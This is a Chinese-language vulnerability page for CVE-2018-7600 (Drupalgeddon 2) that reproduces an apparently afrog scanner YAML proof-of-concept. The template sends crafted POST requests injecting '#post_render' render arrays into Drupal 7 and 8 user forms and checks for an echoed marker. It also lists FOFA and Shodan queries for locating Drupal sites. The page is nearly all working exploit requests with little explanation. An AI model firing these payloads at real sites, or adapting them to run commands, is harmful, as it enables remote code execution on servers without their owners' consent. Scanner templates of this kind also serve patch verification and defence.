CVE-2018-7600: Drupal Drupalgeddon 2 RCE

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Drupal Drupalgeddon 2 RCE fofa: app="Drupal" shodan: http.html:"Drupal"

PoC代码[已公开]

id: CVE-2018-7600

info:
  name: Drupal Drupalgeddon 2 RCE
  author: unkown
  severity: high
  description: |-
    Drupal Drupalgeddon 2 RCE
    fofa: app="Drupal"
    shodan: http.html:"Drupal"
  reference:
    - https://www.drupal.org/node/2891024
  tags: cve,cve2018,drupal,rce
  created: 2023/08/10

set:
  r1: randomLowercase(4)
  r2: randomLowercase(4)
rules:
  drupal70:
    request:
      method: POST
      path: /?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
    expression: response.status == 200
    output:
      search: '"name=\"form_build_id\"\\s+value=\"(?P<build_id>.+?)\"".bsubmatch(response.body)'
      build_id: search["build_id"]
  drupal71:
    request:
      method: POST
      path: /?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        form_build_id={{build_id}}
    expression: response.body.bcontains(bytes(r1 + "%" + r2))
  drupal80:
    request:
      method: POST
      path: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
    expression: response.body.bcontains(bytes(r1 + "%" + r2))
expression: drupal80() || drupal70() && drupal71()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2018/CVE-2018-7600.yaml